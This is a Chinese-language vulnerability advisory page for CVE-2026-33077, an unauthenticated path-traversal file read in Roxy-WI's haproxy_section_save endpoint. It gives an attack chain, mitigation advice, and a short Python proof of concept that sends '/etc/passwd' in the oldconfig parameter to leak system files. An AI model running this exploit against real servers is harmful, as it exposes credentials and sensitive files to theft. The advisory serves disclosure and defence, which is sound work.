IPBUF安全漏洞报告
English
CVE-2026-33077 CVSS 7.5 高危

CVE-2026-33077 Roxy-WI 任意文件读取漏洞

披露日期: 2026-04-24

漏洞信息

漏洞编号
CVE-2026-33077
漏洞类型
任意文件读取
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Roxy-WI

相关标签

任意文件读取Roxy-WI路径遍历信息泄露CVE-2026-33077

漏洞概述

Roxy-WI 是一个用于管理 Haproxy、Nginx、Apache 和 Keepalived 服务器的 Web 接口。在 8.2.6.4 版本之前,其 haproxy_section_save 接口中的 oldconfig 参数存在任意文件读取漏洞。由于缺乏适当的输入验证,未经身份验证的攻击者可利用该漏洞读取服务器上的敏感文件,造成信息泄露。

技术细节

该漏洞源于 Roxy-WI 在处理 haproxy_section_save 接口请求时,未对 oldconfig 参数进行充分的过滤和校验。攻击者可以通过构造包含路径遍历序列(如 '../')或绝对路径的恶意 payload,将其赋值给 oldconfig 参数。当后端服务器接收到该参数时,会直接将其作为文件路径进行读取操作,并将文件内容返回给用户。由于 CVSS 向量显示 PR:N(无需权限)和 UI:N(无需交互),攻击者可在无需登录的情况下远程利用此漏洞,窃取配置文件、源代码或密钥等敏感信息。

攻击链分析

STEP 1
侦察
攻击者识别互联网上暴露的 Roxy-WI 服务实例,并确认其版本低于 8.2.6.4。
STEP 2
漏洞利用
攻击者向 haproxy_section_save 接口发送特制的 HTTP 请求,在 oldconfig 参数中注入恶意文件路径(如 /etc/passwd)。
STEP 3
数据泄露
服务器端处理请求,未经验证直接读取指定文件并将内容返回给攻击者。
STEP 4
后渗透
攻击者分析获取的敏感信息(如数据库凭证、API 密钥),为进一步入侵系统做准备。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Replace with actual vulnerable instance) target_url = "http://localhost:9999/haproxy_section_save" # Vulnerable parameter 'oldconfig' used for path traversal # Exploiting to read /etc/passwd payload_data = { "oldconfig": "/etc/passwd", # Other parameters might be required depending on the form structure "save": "Save" } try: # Sending POST request to exploit the vulnerability response = requests.post(target_url, data=payload_data) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:") print(response.text) # Check if common file indicators are present if "root:x:0:0:" in response.text: print("[!] Vulnerability confirmed: /etc/passwd content leaked.") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}")

影响范围

Roxy-WI < 8.2.6.4

防御指南

临时缓解措施
如果无法立即升级,建议在网络边界设备(如 WAF)上添加针对路径遍历字符(如 ../, ..\)的过滤规则,以阻断针对 haproxy_section_save 接口的恶意请求。同时,应严格限制对 Roxy-WI 管理界面的网络访问权限,仅允许必要的维护 IP 地址连接。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表